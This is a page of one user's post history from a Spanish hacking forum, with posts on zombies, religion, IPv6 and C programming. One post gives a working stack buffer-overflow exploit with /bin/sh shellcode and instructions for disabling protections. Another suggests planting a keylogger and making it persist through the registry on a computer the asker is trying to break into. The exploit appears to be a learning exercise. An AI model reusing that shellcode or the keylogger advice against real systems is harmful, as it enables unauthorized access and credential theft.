elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 ... 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 [50] 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 ... 125
491  Foros Generales / Foro Libre / Re: ¿Y tú que harías en un holocausto zombie? en: 23 Enero 2011, 16:48 pm
Jeje buen dibujete...
Yo me cogeria:
2 Magnum bien grandecitas .50 // En su defecto 2 Desert Eagles jeje...
1 Colt pequeñita para cuando me quede sin las Magnum
2 cuchillas bien grandes
2 escopetacas automaticas, con unas cuantas cajas de municion
1 cuchillo por lo de bob esponja
1 chalequito por si algun superviviente se vuelve loco
1 de guantes (siempre he querido llevar guantes)
5 kg de TNT para cuando se acumulen los zombies
1 foco de luz bien grande para que no me pillen por las espalda / o una linterna
1 punterito laser para reirme un rato
1 movilete para llamar gratis al 091 todo el dia y oir que no estan disponibles
1 mechero para  el TNT
1 navajilla por si las moscas
Mi reloj + Cadena de la Virgen + Lentillas / Gafas ( >:( las odio)
Ah y mi PC
1 ganzua para los hoteles...
Mi DNI para no volverme loco
Un  manos libres de las pelis, para hablar con mi primo jeje
una de monoculares, pos lo mismo que el foco grandote o linternita...
Ropita, que nunca falte

Creo que voy bien. No me dejo nada, no...
492  Seguridad Informática / Análisis y Diseño de Malware / Re: Trojan en dll... ¿Cómo lo elimino? en: 23 Enero 2011, 16:06 pm
Si tienes una DLL dañada, te la tienes que volver a descargar de otro lado, creo...
493  Seguridad Informática / Hacking / Re: KEYLOGGER CON DOS OS en: 23 Enero 2011, 16:05 pm
Las que tengas guardadas en "Contraseñas y claves de cifrado"... Yo como solo tengo la del WiFi... Pero no lo veo muy efectivo... Podrias buscar otra cosa.
494  Foros Generales / Dudas Generales / Re: recomendable o no? en: 23 Enero 2011, 16:01 pm
No creo, los ordenadores de ahora aguantan eso y mas... Aunque nunca viene mal un refrigerador...
495  Foros Generales / Noticias / Re: Se agotan las direcciones IP tradicionales en: 23 Enero 2011, 15:58 pm
Bueno, y encima quitarle los océanos y demás...
IPv6 durará un poco más jeje...
496  Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] ¿No funciona? en: 23 Enero 2011, 15:35 pm
lo que falla es que tienes protecciones anti stack over flow

Los desactivo en el vuln, no en el exploit... Ahora mismo pruebo...
Modf: Anon, nada...

Código
  1. /*
  2. First BoF Linux attack : Sagrini 2010 : elhacker.net
  3. 23 Nops + 25 Shellcode + 4 Ret = 52 [48 Buffer + Ret] + 7 ["./vuln "] = 59
  4.  
  5. gcc -o vuln vuln.c --no-stack-protector -g -z execstack
  6. ./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
  7. $
  8.  
  9. gcc -o exploit exploit.c
  10. ./exploit
  11. $
  12.  
  13. ------------------------------------------
  14. !!! Vuln code !!!
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <string.h>
  18.  
  19. void soy_vuln(char *arg)
  20. {
  21. char buffer [48];
  22. strcpy (buffer, arg);
  23. }
  24.  
  25. int main(int argc, char *argv[])
  26. {
  27. if (argc != 2) return 1;
  28. soy_vuln(argv[1]);
  29. }
  30. ------------------------------------------
  31. */
  32.  
  33. #include <stdio.h>
  34. #include <string.h>
  35.  
  36. int main ()
  37. {
  38. printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
  39.  
  40. char nops [23];
  41. memset (nops, 'A', 23);
  42. char shellcode [25] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
  43.  
  44. char ret [4] = "\x18\x1f\x9b\xbf";
  45.  
  46. char command [59];
  47. strcpy (command, "./vuln ");
  48. strcat (command, nops);
  49. strcat (command, shellcode);
  50. strcat (command, ret);
  51. // system (command);
  52.  
  53. printf ("%s", command);
  54.  
  55. return 0;
  56. }
  57.  
Si os dais cuenta, no ejecuto nada, solo muestro la cadena. Antes de eso, al strcpy (command, shellcode) da el fallo...
Ahora me pasare por el foro C/C++ porque no es fallo de vuln...
Compilo asi...
Código:
juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c --no-stack-protector -z execstack
juanra@Juanra:~/Escritorio/Shell$ ./exploit
First BoF Linux attack : Sagrini 2010 : elhacker.net
Fallo de segmentación
juanra@Juanra:~/Escritorio/Shell$
Alguna idea?
497  Foros Generales / Dudas Generales / Re: como instalar winxp en una hp mini 110 en: 23 Enero 2011, 00:59 am
deseo cambiar a win xp por que considero a win 7 malo e ineficiente ya que es mas que todo visual y grafico y a mi no me llama la atencion esas cosas yo la quiero mas que todo para programar y en win xp lo hago lo mas bien sin problema alguno mas que todo es x eso que me quiero cambiar....

+1 de acuerdo contigo xD...
Prueba los links de arriba, hay mas en Google...
498  Foros Generales / Foro Libre / Re: Científicos piden un plan en caso de contacto alienígena en: 23 Enero 2011, 00:57 am
la religion te explica muchas cosas que de por si mismas te harian hacer pensar mucho (como se creo el mundo, que pasa cuando morimos...) y te crea una falsa sensacion de seguridad.
Podeis dejar de comparar a los extraterrestres con Dios? xD, Yo me tomo a Dios como algo simbolico, de hecho, para mi dios es la "Particula de Dios" (el boson de highs), los extraterrestres solo son otro ser vivo en otro punto del universo.
Lo primero es falso. Los cristianos buscamos tmb el sentido de las cosas. No lo decia en ese sentido, si no no estaria aqui...
Lo segundo es mas cierto...

pero si estoy en completo desacuerdo con todas las religiones ya que me parecen solo una forma de conseguir un porque a cosas que todavia no tienen una explicacion logica. acuerdense de Miguel Servet, nicolas copernico, y muchos otros que trataron de explicar o desentrañar un poco sobre el porque de las cosas y la iglesia los torturo, persiguio, encarcelo y mato.
Repitiria lo de arriba, pero prefiero copiar: Los cristianos buscamos tmb el sentido de las cosas.
Y... no generalices la iglesia con algunas partes de la iglesia.

Si me aseguran que en el cielo follare tanto como quiera adios a todos...
La mayor tonteria de la semana  >:(

La fe no es más que creer ciegamente, sin utilizar el cerebro, en lo que otros nos cuentan pero que tampoco han visto.,
   ¿hemos de creer en tales testimonios?     Yo no lo haría.
                     Creo que si la teoría de la salvación estuviera menos en relación con la presencia de Dios
    y mas en relación con el paraiso de la eterna juventud donde ellas y nosotros fueramos eternamente bellos
    y follaramos indiscriminadamente y a destajo,         habría mas creyentes.
                      La Iglesia, debería hacer una campaña de marketing al respecto y dejarse de martirios, infiernos, demonios y cielos.

                      No me convence lo de ser bueno para subir al cielo y quedarme eternamente contemplando a Dios (¿?)
                                                   con cara de gilipollas.      Debe resultar tedioso. [/size]
Otra tonteria. Lo primero, comparalo con que tu padre te diga te quiero y tu tienes fe de que te quiere... Luego, la iglesia no busca creyentes engañados por la tonteria de lo segundo... Y de lo tercero, Sin Comentarios.
Y  lo cuarto indica que no tienes fe ni de tu padre... No sera asi.

Me dado cuenta que algunos intenta inculcar su religion.
La defiendo de algunas tonterias bastante grandes... Espero que no te siente mal...

                                   No es necesario, ya tenemos una iglesia troglodita y meapilas para convencernos de tonterías.
   No tienes que pedir la baja en el Club.

            El problema Compañero es que la Iglesia Romana se cree su Primacia y te digo que hay otras formas de ser cristiano.
    La Iglesia Ortodoxa (creencia original) surge a la vez que Cristo. Está presente en todos los países del Este de Europa, es pobre,
  no tiene tesoros, se autofinancia con las ayudas de su fieles, no tiene una estructura petrea e  intolerante  como la Iglesia de Roma.,
           no promulga dogmas de fe, no se erige en la interpretadora de la fe, no interpreta a Cristo como hace Roma.

           Roma sigue matando, creo que impedir usar el preservativo como medio de lucha contra el Sida, como promulga y hace Roma.,
       en los países de  Africa es favorecer que la gente muera, y es ser muy hipócritas el predicar "la abstinencia sexual" cuando ellos,
    los sacerdotes no la practican.   Roma impide la investigación con células madre, no acepta que un matrimonio tenga un hijo de selección
   genética para curar a un hermanito enfermo. Roma prefiere la enfermedad, porque sigue pensando que  la enfermedad y el sufrimiento son
                                "Un don de Dios", un camino para ir al Cielo.    Roma solo enseña "la Resignación".
                                                 Roma no tiene defensa ninguna ni justificación.

               La iglesia sabe de   Malostratos   porque sigue sus tácticas, aisla a la víctima, la hace culpable de su desgracia, la condena   para siempre y le asegura que no hay salida. Es lo que desde siempre ha predicado, esa historieta de crímenes y castigos de un dios Vengativo,  Celoso y  Genocida, experto en torturar a su propio pueblo "elegido".   Creo que si los Cristianos realmente conocieran la Biblia, saldrían corriendo  de las iglesias daespués de ver los horrores que cuenta. Total un invento de charlatanes de feria que así hacen sus negocios y mantienen sus privilegios.,
No sabes lo que estas diciendo. No te voy a ir citando porque me duermo. Pero lo peor es lo de los sacerdotes. O no tienes verguenza o nunca has hablado con un sacerdote. Lo demas, te digo que son tonterias, que eso que dices es de extremistas de izquierdas y que la iglesia ortodoxa nacio mas tarde por una tonteria de la romana, en la que se pelearon. Si no sabes lo que paso callate. Fue por una parte del credo, en la que los ortodoxos creian que era generalizada y no era adecuada. Se pelearon y se separaron. Ahora, son exactamente iguales, excepto porque sus misas duran 3h. y esa parte del Credo...

Los cristianos llevan generando muerte casi desde su creacion, imponiendosela a culturas que invaden, y arruinando a pueblerinos analfabetos comprando sus bulas para que no fuesen al infierno
Aveces me parece incluso descabellada, que despues de tantos años de ciencia, aun se siga creyendo en Dios, no se dan cuenta que por su culpa, estamos menos evolucionados, con todas las leyes fisicas, teorias de evolucion con suficientes pruebas, leyes matematicas, etc etc, la gente sigue creyendo que todo es regido por algo que ni vemos, ni sabemos donde se encuentra, solo algunos pueden intuirlo...
Falso lo primero, incorrecto lo segundo. Mira lo de arriba...

No soy un caza milagros, ni me preocupa que ocurran, símplemente estoy esperando a que se presente Dios para creer en él.
Obraré con sinceridad pero no porque me lo diga un libro, o el mismo Dios, sino porque no veo objetivo en obrar falsamente.
Lo primero, nunca se te aparecera... Leete lo de mi anterior post...
Sabes que eso son las "reglas" que tenemos en nuestro corazon desde que nacemos? Sabemos que esta mal matar no porque nos lo digan...



Me da pena que todos penseis asi, ojala alguien se de cuenta de como es el mundo. Asi es la vida... Abrid los ojos y pensad. Yo ya lo hago. Soy un buen cristiano porque me doy cuenta que no es todo "seguir los mandamientos". Veo la Biblia, la interpreto, la pienso y la reflexiono. Y me doy cuenta de como es el mundo. Y os digo que hasta un ateo deberia hacer eso. La biblia no esta tan manchada como creeis...
Y si no quereis leer la biblia, leed el Camino. Espero que no penseis mal de San Jose María... Suerte!
499  Programación / Programación C/C++ / Re: Ayuda Clases c++ en: 23 Enero 2011, 00:33 am
Si te sirve en C, me saco esto de la manga jeje...
Código
  1. #include <stdio.h>
  2.  
  3. int main ()
  4. {
  5. struct documento
  6. {
  7. char titulo[20];
  8. char genero[20];
  9. char idioma[20];
  10. int edad_recomendada;
  11. int axo;
  12. int prestado;
  13. int dias_prestamo;
  14. };
  15.  
  16. int num, i;
  17. printf ("Num. docs: ");
  18. scanf ("%d", &num);
  19. struct documento docs [num];
  20. for (i = 0; i<num; i++)
  21. {
  22. printf ("Titulo %d: ", i);
  23. fgets (docs [i].titulo, 20, stdin);
  24. printf ("Genero %d: ", i);
  25. fgets (docs [i].genero, 20, stdin);
  26. printf ("Idioma %d: ", i);
  27. fgets (docs [i].idioma, 20, stdin);
  28. printf ("Edad recm. %d: ", i);
  29. scanf ("%d", &docs [i.edad_recomendada]);
  30. printf ("A*o %d: ", i);
  31. scanf ("%d", &docs [i.axo]);
  32. printf ("Prestado %d: ", i);
  33. scanf ("%d", &docs [i.prestado]);
  34. printf ("Dias prestamo %d: ", i);
  35. scanf ("%d", &docs [i.dias_prestamo]);
  36. }
  37.  
  38. getchar ();
  39. return 0;
  40. }
  41.  

Ahi te lo dejo. Ahora debes continuar con el ejercicio jeje... Lo de dias prestamo podrias calcular el tiempo... Mira funciones de tiempo en el "Rincon del C++". Lo explican muy bien... (Url: Google).
Y lo de prestado puedes usar tmb tiempo, pero solo obtenerlo...

Ahora deberias meterle algo para que vaya guardando en algun sitio, un fichero, etc...
Suerte!
500  Seguridad Informática / Hacking / Re: Ordenador bastante protegido en: 23 Enero 2011, 00:17 am
Si no va el cmd.exe prueba con el command.com :P anda que...  ;) necesitaras privilegios de Admin, ahora que me acuerdo...
Pon un keylogger no? Alguno del foro servira, luego lo añades manualmente tu con alguna API al HKCU, ahi seguro tienes permisos jeje...
Páginas: 1 ... 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 [50] 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 ... 125
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines